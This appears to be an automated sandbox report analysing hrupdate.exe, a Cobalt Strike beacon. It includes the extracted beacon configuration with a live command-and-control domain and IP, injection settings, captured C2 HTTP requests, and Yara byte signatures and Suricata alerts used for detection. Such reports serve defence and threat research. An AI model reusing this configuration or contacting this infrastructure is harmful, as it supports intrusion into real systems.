Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hrupdate.exe

Overview

General Information

Sample name:hrupdate.exe
Analysis ID:1578569
MD5:03b14e9338a1c9e5551f9450207f6d84
SHA1:f1a816c47637c8d4d0b52b333cba11b0d7571fcb
SHA256:7a4d2b3e83220df7a55944a838bb9ebaa8f8463cff62fa92ae10e640eeb4e498
Tags:CobaltStrikeexeuser-smica83
Infos:

Detection

CobaltStrike
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Machine Learning detection for sample
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • hrupdate.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\hrupdate.exe" MD5: 03B14E9338A1C9E5551F9450207F6D84)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 15000, "MaxGetSize": 2801745, "Jitter": 37, "C2Server": "www.hrtraining.ro,/rss/portallogin-gettask.html", "HttpPostUri": "/rss/portallogin-sendlogin.html", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 309948737, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
  • 0xd58b:$beacon_loader_x86: 25 FF FF FF 00 3D 41 41 41 00 75 3B 8B 4D B0 81 E1 FF FF FF 00 81 F9 42 42 42 00 75
  • 0xe236:$beacon_loader_x86: 25 FF FF FF 00 3D 41 41 41 00 75 3B 8B 4D B0 81 E1 FF FF FF 00 81 F9 42 42 42 00 75
dump.pcapWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0x3f28a:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
dump.pcapWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
  • 0x3f2f6:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
dump.pcapTrojan_Raw_Generic_4unknownunknown
  • 0xdf4e:$s0: 83 C6 02 8B 7D FC B9 40 00 00 00 F3 A4 8B 45 18 50 6A 40 8B 4D FC 51 E8 DD F8 FF FF 83 C4 0C 8B 55 FC 52 8B 45 14 50 8B 4D 08 8B 51 04 FF D2
  • 0xe52a:$s1: 0F B7 11 81 FA 4D 5A 00 00 75 2E 8B 45 FC 8B 48 3C 89 4D F8 83 7D F8 40 72 1F 81 7D F8 00 04 00 00 73 16 8B 55 F8 03 55 FC 89 55 F8 8B 45 F8 81 38 50 45 00 00 75 02 EB 0B 8B 4D FC 83 E9 01 89 ...

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
    00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
      • 0xbb91:$beacon_loader_x86: 25 FF FF FF 00 3D 41 41 41 00 75 3B 8B 4D B0 81 E1 FF FF FF 00 81 F9 42 42 42 00 75
      • 0xc764:$beacon_loader_x86: 25 FF FF FF 00 3D 41 41 41 00 75 3B 8B 4D B0 81 E1 FF FF FF 00 81 F9 42 42 42 00 75
      00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
      • 0x39798:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
      00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
      • 0x39804:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      Click to see the 141 entries

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-19T22:40:10.184763+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449732TCP
      2024-12-19T22:40:12.460101+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449733TCP
      2024-12-19T22:40:14.719895+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449734TCP
      2024-12-19T22:40:16.946092+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449735TCP
      2024-12-19T22:40:19.139463+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449736TCP
      2024-12-19T22:40:21.341756+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449737TCP
      2024-12-19T22:40:23.519951+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449739TCP
      2024-12-19T22:40:25.721653+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449743TCP
      2024-12-19T22:40:27.940593+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449745TCP
      2024-12-19T22:40:30.184707+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449747TCP
      2024-12-19T22:40:32.389565+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449748TCP
      2024-12-19T22:40:34.593434+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449749TCP
      2024-12-19T22:40:37.076058+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449750TCP
      2024-12-19T22:40:39.262084+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449751TCP
      2024-12-19T22:40:41.451628+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449752TCP
      2024-12-19T22:40:43.637480+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449753TCP
      2024-12-19T22:40:45.859708+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449754TCP
      2024-12-19T22:40:48.078863+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449755TCP
      2024-12-19T22:40:50.313429+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449756TCP
      2024-12-19T22:40:52.531888+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449757TCP
      2024-12-19T22:40:54.751135+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449758TCP
      2024-12-19T22:40:57.300211+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449759TCP
      2024-12-19T22:40:59.572951+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449760TCP
      2024-12-19T22:41:01.797499+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449762TCP
      2024-12-19T22:41:04.032576+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449769TCP
      2024-12-19T22:41:06.238003+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449775TCP
      2024-12-19T22:41:08.451619+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449781TCP
      2024-12-19T22:41:10.661934+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449786TCP
      2024-12-19T22:41:12.853433+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449792TCP
      2024-12-19T22:41:15.076878+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449798TCP
      2024-12-19T22:41:17.263569+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449804TCP
      2024-12-19T22:41:19.468276+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449810TCP
      2024-12-19T22:41:21.705590+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449815TCP
      2024-12-19T22:41:24.178894+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449821TCP
      2024-12-19T22:41:26.459077+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449827TCP
      2024-12-19T22:41:29.199615+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449833TCP
      2024-12-19T22:41:31.386751+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449840TCP
      2024-12-19T22:41:33.601036+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449846TCP
      2024-12-19T22:41:35.806119+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449852TCP
      2024-12-19T22:41:38.368416+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449858TCP
      2024-12-19T22:41:40.937992+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449865TCP
      2024-12-19T22:41:43.149956+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449871TCP
      2024-12-19T22:41:45.375076+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449877TCP
      2024-12-19T22:41:47.592163+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449882TCP
      2024-12-19T22:41:49.788480+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449888TCP
      2024-12-19T22:41:51.995130+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449894TCP
      2024-12-19T22:41:54.188389+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449901TCP
      2024-12-19T22:41:56.390667+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449907TCP
      2024-12-19T22:41:58.592336+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449913TCP
      2024-12-19T22:42:00.970693+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449919TCP
      2024-12-19T22:42:03.186879+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449926TCP
      2024-12-19T22:42:05.412463+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449932TCP
      2024-12-19T22:42:07.800162+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.449938TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-19T22:40:04.711841+010028033053Unknown Traffic192.168.2.4497303.79.209.7680TCP
      2024-12-19T22:40:06.615659+010028033053Unknown Traffic192.168.2.4497313.79.209.7680TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Found malware configuration
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 15000, "MaxGetSize": 2801745, "Jitter": 37, "C2Server": "www.hrtraining.ro,/rss/portallogin-gettask.html", "HttpPostUri": "/rss/portallogin-sendlogin.html", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 309948737, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for sample
      Source: hrupdate.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FD4173 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_04FD4173
      Source: hrupdate.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: hrupdate.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb source: hrupdate.exe
      Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb%% source: hrupdate.exe
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FCE544 _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_04FCE544
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FC8839 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_04FC8839

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49736
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49760
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49735
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49748
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49762
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49752
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49732
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49743
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49749
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49739
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49758
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49750
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49734
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49733
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49827
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49757
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49753
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49747
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49804
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49852
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49751
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49781
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49754
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49745
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49810
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49815
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49737
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49846
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49775
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49759
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49786
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49755
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49894
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49840
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49769
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49756
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49938
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49877
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49865
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49901
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49882
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49926
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49798
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49792
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49871
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49932
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49907
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49833
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49888
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49919
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49821
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49913
      Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49858
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.hrtraining.ro
      Source: global trafficHTTP traffic detected: GET /trakingu/user HTTP/1.0Host: www.hrtraining.ro
      Source: global trafficHTTP traffic detected: GET /trainingcheck_v5498 HTTP/1.0Host: www.hrtraining.ro
      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 3.79.209.76:80
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49730 -> 3.79.209.76:80
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
